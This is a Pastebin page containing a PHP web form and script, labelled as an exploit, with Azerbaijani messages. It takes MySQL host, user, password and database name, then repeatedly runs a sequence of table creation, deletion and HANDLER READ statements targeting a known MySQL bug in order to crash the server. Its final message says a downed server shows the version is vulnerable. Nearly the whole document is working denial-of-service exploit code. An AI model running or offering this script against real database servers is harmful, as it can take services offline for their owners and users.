Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <html>
- <head>
- <style type="text/css">
- body
- {
- background-color:black;
- color:red;
- }
- </style>
- <table border="1">
- <form name="dostest" method="post" action="">
- <tr><td><label><ul><li>Mysql Server (Host):</li></ul></label>
- <td><input type="text" name="host" id="host" size="40"/></td></tr>
- <tr><td><label><ul><li>Mysql User:</li></ul></label>
- <td><input type="text" name="user" id="user" size="40" /></td></tr>
- <tr><td><label><ul><li>Mysql Userin Parolu:</li></ul></label>
- <td><input type="text" name="pass" id="pass" size="40" /></td></tr>
- <tr><td><label><ul><li>Mysql Database:(Baza)</li></ul></label>
- <td><input type="text" name="database" id="database" size="40" /></td></tr>
- </table>
- <?php echo str_repeat('<ul>'. PHP_EOL,3);?>
- <input type="submit" name="s2k" id="s2k" value="Exploit Et Gor nese Alinir?)" />
- <?php echo str_repeat('</ul>'. PHP_EOL,3);?>
- </form>
- <?php
- /*
- Coded By AkaStep
- Vuln Discovered by:(eromang)
- http://pastebin.com/tCxNTD96
- */
- error_reporting('off');
- if(isset($_POST['s2k']) && isset($_POST['host']) && !empty($_POST['host']) && isset($_POST['user']) && !empty($_POST['user']) && isset($_POST['pass'])
- &&!empty($_POST['pass']) && isset($_POST['database']) && !empty($_POST['database']))
- {
- $_POST=array_map('htmlentities',$_POST);
- $mysqlhost=$_POST['host'];
- $mysqluser=$_POST['user'];
- $mysqluserpass=$_POST['pass'];
- $mysql_db=$_POST['database'];
- //die(var_dump($_POST));
- /* EXPLOIT */
- $sl=mysql_connect($mysqlhost,$mysqluser,$mysqluserpass) or die('Qosula Bilmirem Mysql Servere');
- $selectdb=mysql_selectdb($mysql_db) or die('Database Yoxdur! Yaxud Grant Yoxdur:*(');
- echo '1)Exploit Edirik.Gorek ne olur)) Gozle...<br>';
- for($i=0;$i<=3;$i++)
- {
- mysql_query('DROP TABLE IF EXISTS `bug13510739`',$sl) or die('Icra Ede bilmirem: #0 ()');
- mysql_query('CREATE TABLE `bug13510739` (c INTEGER NOT NULL, PRIMARY KEY (c)) ENGINE=INNODB',$sl) or die('Icra Ede bilmirem: #1 ()');
- mysql_query('INSERT INTO `bug13510739` VALUES (1), (2), (3), (4)') or die('icra Ede bilmirem #2');
- mysql_query('DELETE FROM bug13510739 WHERE c=2') or die('Icra ede bilmirem #3');
- mysql_query('HANDLER bug13510739 OPEN') or die('Icra ede bilmirem #4');
- mysql_query('HANDLER bug13510739 READ `primary` = (2)') or die('Icra ede bilmirem #5');
- mysql_query('HANDLER bug13510739 READ `primary` NEXT') or die('Icra ede bilmirem #6');
- mysql_query('DROP TABLE bug13510739') or die('icra ede bilmirem! #7');
- }
- die('2)Exploit edildi. <br>
- 3)Son.<br>
- 4)Server Down-a Getse Demeli Vulnerabledir MYSQL. Update Etmelisen.<br>');
- /* EOF */
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement